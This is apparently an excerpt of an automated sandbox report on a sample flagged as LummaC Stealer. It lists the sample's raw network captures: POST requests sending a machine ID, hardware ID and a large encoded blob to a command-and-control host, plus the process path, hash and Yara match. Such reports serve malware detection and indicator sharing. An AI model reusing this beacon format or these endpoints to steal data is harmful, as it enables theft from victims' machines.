                                                                          2025-04-13 15:06:40 UTC15331OUTData Raw: 2d 2d 68 36 33 53 39 39 6c 32 36 62 62 4d 6e 6c 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 63 36 62 34 38 39 61 36 62 31 33 61 36 32 32 31 32 64 36 36 63 63 37 34 39 38 38 65 65 37 30 30 31 37 66 65 65 32 32 38 62 66 36 0d 0a 2d 2d 68 36 33 53 39 39 6c 32 36 62 62 4d 6e 6c 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 68 36 33 53 39 39 6c 32 36 62 62 4d 6e 6c 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 31 39 41 39 31 42 33 46
                                                                          Data Ascii: --h63S99l26bbMnl8Content-Disposition: form-data; name="uid"0c6b489a6b13a62212d66cc74988ee70017fee228bf6--h63S99l26bbMnl8Content-Disposition: form-data; name="pid"1--h63S99l26bbMnl8Content-Disposition: form-data; name="hwid"CA19A91B3F
                                                                          2025-04-13 15:06:40 UTC15331OUTData Raw: 21 bd 95 82 02 48 17 57 ee 4c 2e e2 32 58 78 56 0a 22 2d 51 1c 43 c3 97 e0 49 9f c3 e0 f4 6e 8e fe a1 ea 9b a5 49 38 cb 65 df 39 e3 c5 75 8b 04 8a 7c 73 be 86 20 95 f6 ef 22 1f bd 5e 6e 05 03 43 4d e2 73 0e 7b d2 47 71 11 46 54 31 29 76 7b f0 a9 46 21 a7 51 51 e9 47 84 cf 6e 5a 96 23 b7 94 a1 ae 8e 66 76 74 c6 bb 05 c6 db 1d a3 b2 0f 34 cf d2 21 91 05 6e f6 26 92 54 8b 45 6e 5e 03 66 d6 c9 db 06 59 da 56 df ec 66 64 bf 6c eb 6c aa 6a bf 6c e1 ef 34 e7 68 8b 61 c8 63 ea 47 f8 ea fb 76 25 a7 55 83 45 43 52 19 f0 b9 c9 85 07 cb e0 5c b7 ae 1c b1 bb 92 c6 56 6c 52 34 8c 4d ff f1 4e 7f d0 a3 25 f7 8d fc 1c e3 ae 50 e3 28 93 e5 72 77 db 5a 43 85 cc 0b d7 7c dd ed 36 93 cd b6 7d 12 64 99 f4 14 b7 0c 8b 00 f6 e9 64 b6 f7 dc 89 3b 74 14 3f 81 ef 84 6f c1 72 85 80
                                                                          Data Ascii: !HWL.2XxV"-QCInI8e9u|s "^nCMs{GqFT1)v{F!QQGnZ#fvt4!n&TEn^fYVfdlljl4hacGv%UECR\VlR4MN%P(rwZC|6}dd;t?or
                                                                          2025-04-13 15:06:40 UTC15331OUTData Raw: c7 03 13 7e 14 9b b7 67 ac 95 ab 87 56 38 e5 df bc 68 f9 6f 8b 2c 06 1d 37 61 a5 62 69 3b c2 f8 ec 9f 84 9e 3b 6c 5b 74 84 34 69 59 ff 2c 88 d9 dd 37 15 93 d8 94 d7 b2 54 21 74 50 0a 8f a0 4e 79 4c f0 3f 9e ed 4d eb a6 43 b3 c3 08 f9 2a 9e 7c 96 f5 29 2c 3a a9 3c f7 2c c2 e1 20 22 df 33 c2 10 96 8d 66 4e 64 e7 52 84 bb 8a b5 9e 75 2b 8b ef ab 3c df e2 e1 f2 59 02 4c 14 6f 4c 19 9c 19 2f 3c 0f 04 df 06 bd e5 98 27 8f d1 b3 4d a0 94 e4 69 f6 1a 66 61 a1 0c 73 0d 6d 01 d2 d7 9b 22 42 88 74 28 f5 81 c5 1a 47 19 7f 37 b5 d7 ef c6 06 48 c2 a5 c3 c2 0d 9f ac 49 13 e5 08 2e 8e 05 1c a1 48 25 b5 43 fc 77 43 94 75 92 a0 3a a9 49 43 da 19 b7 d9 19 a6 2e 47 71 56 f8 9d 3b d7 46 28 22 ad 80 cc 53 00 5f 0c 59 7b ba 29 6b 5f ae f2 20 65 69 03 c6 d3 3d fe a8 39 8b ea 1c
                                                                          Data Ascii: ~gV8ho,7abi;;l[t4iY,7T!tPNyL?MC*|),:<, "3fNdRu+<YLoL/<'Mifasm"Bt(G7HI.H%CwCu:IC.GqV;F("S_Y{)k_ ei=9
                                                                          2025-04-13 15:06:40 UTC15331OUTData Raw: c1 af 2c cd 77 e6 a7 e4 30 71 70 1a 62 a6 d9 f0 2e 6f bb 13 4a 4f 83 eb 9f 70 03 ab 26 e1 07 df f7 4b 2a 23 93 0d a6 62 60 9b 3e 96 2a bb 18 69 61 08 0e 02 1f 46 09 da 65 b3 b4 90 8f dd 59 e3 9e 6d e8 10 11 84 4d 29 03 d3 00 16 35 8f e4 21 84 ca f7 b3 7e b4 56 51 42 41 03 fd e8 d1 ae 6e 03 89 59 db b8 3b 6e 67 e2 59 d3 8c 15 27 ae 19 81 d3 88 96 62 6b 9b 18 ba 53 d7 41 fe ed b8 e2 69 9b 69 9a 77 ca 97 56 0f be 11 c3 43 1c f6 6f 6e 55 f7 e4 9f 27 ab 4b 2a c5 10 85 a8 45 4f 2c 2b 0a fd e2 18 5b 93 94 a0 56 dd 9a db ab a0 13 bf 76 da 5f 0f 5c 09 fb 72 bf 8f 8f ef be dc 2e b6 84 67 ad 91 19 48 eb b9 27 b1 18 03 41 33 21 93 2a a2 1f 20 f8 ec 8a 3f d9 c8 35 55 e9 04 b3 a6 ed 6a 84 35 78 a8 f2 a8 5e 8f 33 d5 30 e0 24 bd 78 b0 99 78 6d 09 f2 f0 f1 fe 06 d0 13 d6
                                                                          Data Ascii: ,w0qpb.oJOp&K*#b`>*iaFeYmM)5!~VQBAnY;ngY'bkSAiiwVConU'K*EO,+[Vv_\r.gH'A3!* ?5Uj5x^30$xxm
                                                                          2025-04-13 15:06:40 UTC15331OUTData Raw: 0d e2 85 b3 5a d5 c0 94 97 55 91 c2 ba 65 cc e9 c8 d2 64 b7 60 2a e9 22 6b ee 5d 8c 8c 88 dc 06 56 37 38 e7 bb 99 5a 73 5d 34 05 ff 4e 0b db dc 7e c7 e9 6c 2d 5d ed ac 62 d1 6c a8 95 3d 59 58 47 82 61 ec e8 74 2b 95 f9 f0 c4 f8 97 45 35 dd 33 8c 7c 9e 2d 74 3c 04 a3 f3 d4 bd 99 0e f1 c9 df 88 da 21 70 8a e2 02 83 11 32 77 08 d3 e0 ff 0d fc 13 3f 29 40 a8 36 4d 97 06 e2 d4 24 18 fb 8a b7 eb 86 04 52 70 2d 37 ad b2 5c 1a f3 c4 f2 63 3b 16 49 be b8 62 66 10 6f 8c ae e0 f4 de 22 0b bc 2c 81 96 a9 31 86 54 2f f3 a4 e2 76 49 2e 1f 3a c1 c2 9a 18 18 bb 11 c5 da 54 9a 43 78 14 1b a7 84 37 7a dd 13 da cb 1a 95 96 97 84 16 3f 1a 60 e5 76 c2 48 47 c3 5a 42 b1 9e b9 c8 6e 0b 73 48 fb ea e2 ca 1b 56 ec 74 79 c0 89 31 49 8e 75 2a 3d 0f 01 5e b3 b6 43 ce 72 5b 48 c4 3f
                                                                          Data Ascii: ZUed`*"k]V78Zs]4N~l-]bl=YXGat+E53|-t<!p2w?)@6M$Rp-7\c;Ibfo",1T/vI.:TCx7z?`vHGZBnsHVty1Iu*=^Cr[H?
                                                                          2025-04-13 15:06:40 UTC15331OUTData Raw: 80 24 59 72 f9 8d f6 e2 f7 2c 20 ea 41 23 3c e6 89 2a 76 39 96 e2 0d a9 4f ac 7e 33 09 06 14 49 66 4a 13 c5 39 2d 26 ec 74 bd 99 85 3d 91 98 4c cb 02 06 6b 5c ad 5e 83 80 63 1a 4a a5 20 63 3e 5a 02 5a 1b e7 9c 22 4c dc 94 9e 10 7c fa fd b5 43 59 3a fc d1 28 f9 44 8f 9e ec f9 55 97 d8 f0 64 13 6d 81 3d 85 f2 16 02 61 53 55 aa 50 ed a6 12 34 8a e5 4d 95 30 a3 c8 e7 61 4f 61 1c 26 0c 9f 8b 90 c3 93 9d b2 59 46 93 9e 8f a6 d4 05 f4 c5 5d 97 fd 72 67 23 6c dc e6 ec 88 fe ae 69 ba 45 fa ba 47 1e a9 02 dc 58 e4 00 bc f6 27 88 78 d5 75 95 ec 82 57 52 b9 91 51 c8 29 2b ab b8 f8 09 e5 4c f2 75 7b 77 6b 54 0b 01 d2 75 95 21 39 ae 18 2f 7f 19 57 81 4e 17 0a 97 1b cd 73 9e e2 d2 f9 03 7e 1b 63 e9 83 b4 03 0c 7f e9 9a fd 90 97 75 e8 be d5 c2 37 95 b3 c8 6c 56 6c 23 3f
                                                                          Data Ascii: $Yr, A#<*v9O~3IfJ9-&t=Lk\^cJ c>ZZ"L|CY:(DUdm=aSUP4M0aOa&YF]rg#liEGX'xuWRQ)+Lu{wkTu!9/WNs~cu7lVl#?
                                                                          2025-04-13 15:06:40 UTC15331OUTData Raw: ca 5c ac 66 70 48 e0 6b 85 f7 9c 02 7b 82 a0 0e 36 f5 3b eb 39 8d 3a 2c 42 d6 b0 08 59 9f 8a 88 65 d3 fd d8 10 ba 1b 03 c0 61 43 20 02 b5 69 87 7a 11 42 fa a5 10 e8 8d 0d ae f0 53 f3 da 17 28 cc da 85 81 50 79 bc 05 56 71 99 5a d9 71 4e a8 cc c8 16 39 4b 61 e9 10 21 39 2a 2c 7e 20 08 84 20 e4 08 04 19 2e 48 c2 b3 ce c9 b9 d0 1e 42 f7 d3 f5 1e d2 10 99 d4 92 7c c4 63 9e 5b e9 8f 1d 25 40 75 c6 b9 b7 a2 a4 da 6e 1b b7 dc f3 b2 03 22 df 37 f1 53 9b ca 24 b7 2f a1 5e 6d 18 8b a4 db e4 b7 7b 89 75 06 72 b7 a7 08 ad cb bf 28 56 6a f8 25 40 2f 1c 65 8f 82 a0 20 46 88 b0 f6 1c b7 d7 73 14 0c d6 c5 14 62 e2 e7 40 80 15 2e 0f 2e c9 ff 9c 8a 19 5b 1e 9f aa cf 91 b6 8a a1 10 89 aa 70 a5 56 61 c3 ee 29 12 36 af d8 96 12 9f d2 9a ea 72 9a 5c 29 b3 29 bd 8e d0 50 39 cf
                                                                          Data Ascii: \fpHk{6;9:,BYeaC izBS(PyVqZqN9Ka!9*,~ .HB|c[%@un"7S$/^m{ur(Vj%@/e Fsb@..[pVa)6r\))P9
                                                                          2025-04-13 15:06:40 UTC15331OUTData Raw: 0d 5c 43 c4 51 c8 64 f0 d6 7f 53 72 3e 5b 44 c1 d2 11 c7 54 3e 68 f0 27 c2 6b 4e 95 9b 5e 1b 2f c6 38 8a 07 ee 8c 8c c4 1f a3 e0 12 d7 5c ab 49 c7 27 ac 75 1e b1 b9 18 14 72 ca be a3 68 44 5a 9c 1a 33 48 e4 16 9b 5d af af 69 71 12 7b 2d 01 2f eb c1 35 e8 68 35 ce 13 b3 da d2 2f 90 e5 e1 38 ba 82 73 1e 0d d6 b8 c4 55 6f 81 78 76 c1 87 08 cb 57 48 30 e0 41 89 fe 80 31 16 93 9e d8 de 0e e5 e6 84 6e 61 01 9b 03 be 09 7d 80 8f 46 7e a3 21 80 bb 72 8a 66 78 23 01 af a8 33 6d ad 11 7b a9 ab 2d 22 0b 17 69 41 ae cb b2 4f 5a db 18 e8 53 1b 3c 6e 37 c2 ad 11 20 a1 76 d9 5c 82 ee 98 95 02 a3 6e 43 87 21 e9 d6 98 55 07 3d d9 c9 4f 71 b3 b4 d5 5f 42 89 ba 0d 54 b6 ea ac f7 36 72 ec ef 88 14 48 22 84 4e cb 86 26 40 0d 11 8a cd a4 55 1c 9f f2 7f 2a 24 ef f8 b7 8e 15 fa
                                                                          Data Ascii: \CQdSr>[DT>h'kN^/8\I'urhDZ3H]iq{-/5h5/8sUoxvWH0A1na}F~!rfx#3m{-"iAOZS<n7 v\nC!U=Oq_BT6rH"N&@U*$
                                                                          2025-04-13 15:06:40 UTC15331OUTData Raw: 29 1b fc d2 8f 2e fb 2a fe c6 8c 85 d5 f1 c2 41 9f 31 4f 65 06 55 a8 a5 7f 52 cb 35 0b 5f 37 d8 eb 6a f4 6a 57 f6 6d ea 4a b9 b5 09 a9 52 7c 31 bf af a2 52 e4 1a f8 e0 51 8e 10 57 12 2a 0c 63 1c c0 6e d9 4c 11 83 c5 9b 98 4f d0 27 0f f1 72 fc 35 b6 f2 7e 15 a5 88 eb 8e f7 83 2a 79 74 8b ae 0e 5a 0a c1 d1 69 34 05 ee 9c d9 c6 1a a3 c7 92 57 2c 29 29 1c 12 27 a6 40 1f 8e cc c4 7a 3d 82 37 76 07 15 3f 46 7d 33 23 4d 4c 02 29 3b f7 12 a7 8b 98 94 77 bc 36 54 42 af 04 e3 d1 97 b5 03 2a f4 db d4 a2 2b e2 51 b6 7c 2e 19 08 29 5d 6c f1 c9 26 a9 19 c8 70 b8 2e c3 a0 b1 11 b4 d7 39 27 85 7e 67 d1 e5 ca 1f 1a fc 64 c8 76 5a 7f 54 93 d2 53 d6 b9 18 d1 17 b9 46 9a 10 82 e3 f3 ba bd 6f 1f 61 c8 67 3f c8 4c 71 11 6b 74 bc cb f0 df 02 ab ba 99 2a f7 f7 74 37 5a a4 89 24
                                                                          Data Ascii: ).*A1OeUR5_7jjWmJR|1RQW*cnLO'r5~*ytZi4W,))'@z=7v?F}3#ML);w6TB*+Q|.)]l&p.9'~gdvZTSFoag?Lqkt*t7Z$
                                                                          2025-04-13 15:06:40 UTC15331OUTData Raw: b1 37 42 71 d1 a2 2a 6e 72 c1 73 a1 18 ff fb 32 67 28 41 d2 2c d0 17 02 60 9d 70 b2 f1 c1 ee 0b 60 a3 d4 88 89 05 51 f1 9e 4e 52 d1 17 71 e2 cf 16 f8 7e 13 c0 21 e8 72 fb f5 4d 07 5f cc 58 da 34 97 1b f9 19 91 93 32 0c a2 da 25 af c9 9a f5 f0 fd 26 59 e9 87 7f 7d 67 6c 26 0c 52 a7 2f 9b e2 5f 66 4b 68 2e d4 e7 e0 89 7a 38 b6 1f 47 2c b1 b3 ea d3 db 7b 65 67 53 f3 59 38 12 80 bf ed 08 8b 21 5b 69 f0 e6 c3 ff 63 aa 43 c0 5d e5 58 56 f2 20 bf 7a 0d f4 35 6d 16 7e 08 77 1c b5 ea 61 f5 2e 5a 52 af 6b 12 0b 54 2c c3 1e f4 05 ca 70 63 d3 42 d2 ad d1 a4 56 39 85 b4 87 e2 cf 3d 36 3d 6c 70 d8 98 6b 10 ae b6 5d 46 71 67 90 18 21 ca a8 fe 14 44 8c 0f 7a 16 65 bb b3 f6 a1 c6 ba 3c e7 94 02 71 0d d7 ac 87 0c b2 8d a9 18 c3 15 d5 6d 3c 38 c9 a8 e3 5e 98 63 1c 61 e8 4e
                                                                          Data Ascii: 7Bq*nrs2g(A,`p`QNRq~!rM_X42%&Y}gl&R/_fKh.z8G,{egSY8![icC]XV z5m~wa.ZRkT,pcBV9=6=lpk]Fqg!Dze<qm<8^caN
                                                                          2025-04-13 15:06:42 UTC826INHTTP/1.1 200 OK
                                                                          Date: Sun, 13 Apr 2025 15:06:42 GMT
                                                                          Content-Type: application/json
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B8Kio06rQ%2BGfXN4qqKqlU7ak0BW1LE2gHPf6TkvinymZhtG3UTSe6f7IWnBvPy%2B7CGgu%2Bk8RuElliafmdcvDRXWcljoMZeMGxysK1YrPJDXUwsl31RLG%2B6pWX0owDVzotLHk6HU8oA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 92fbde63186bae89-JAX
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=113539&min_rtt=112711&rtt_var=24597&sent=294&recv=449&lost=0&retrans=0&sent_bytes=2851&recv_bytes=591856&delivery_rate=35800&cwnd=252&unsent_bytes=0&cid=f4275070a67ffa9a&ts=1680&x=0"


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.649698104.21.13.1264437344C:\Users\user\Desktop\1st.Setup_patched.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-04-13 15:06:42 UTC269OUTPOST /agbb HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                          Content-Length: 91
                                                                          Host: winetersgard.digital
                                                                          2025-04-13 15:06:42 UTC91OUTData Raw: 75 69 64 3d 30 63 36 62 34 38 39 61 36 62 31 33 61 36 32 32 31 32 64 36 36 63 63 37 34 39 38 38 65 65 37 30 30 31 37 66 65 65 32 32 38 62 66 36 26 63 69 64 3d 26 68 77 69 64 3d 43 41 31 39 41 39 31 42 33 46 35 46 44 41 36 37 38 44 30 37 46 44 44 32 45 31 32 34 43 32 33 34
                                                                          Data Ascii: uid=0c6b489a6b13a62212d66cc74988ee70017fee228bf6&cid=&hwid=CA19A91B3F5FDA678D07FDD2E124C234
                                                                          2025-04-13 15:06:43 UTC795INHTTP/1.1 200 OK
                                                                          Date: Sun, 13 Apr 2025 15:06:43 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 43
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IOEduw%2B2JOdPAdX7YZLVJ70D8aAVgMklg3ii2cyUA6WVFC01hIaMSnFlzwi8eVcQ370oU6LdL%2BgLtMII9CcovzVANRsxw5DATew7Hd9CjJMWhubraQdcJozZ%2BiVidFa9hmGBzv%2Bw2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 92fbde72ee8d804f-JAX
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=112724&min_rtt=112599&rtt_var=23857&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2852&recv_bytes=996&delivery_rate=35842&cwnd=252&unsent_bytes=0&cid=05736f50e3ac27e7&ts=512&x=0"
                                                                          2025-04-13 15:06:43 UTC43INData Raw: f0 63 a1 2f 01 9d 06 8f 3c 1b a9 6d 96 fd f9 db 15 52 50 78 bd 18 00 79 08 29 31 d0 29 a6 33 3a a2 fe 9e f7 71 08 81 18 65 6b 07
                                                                          Data Ascii: c/<mRPxy)1)3:qek


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Target ID:0
                                                                          Start time:11:06:09
                                                                          Start date:13/04/2025
                                                                          Path:C:\Users\user\Desktop\1st.Setup_patched.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\1st.Setup_patched.exe"
                                                                          Imagebase:0x420000
                                                                          File size:2'610'176 bytes
                                                                          MD5 hash:2154ECE4944B0F4CBA3F7D2E51B84CA3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Reset < >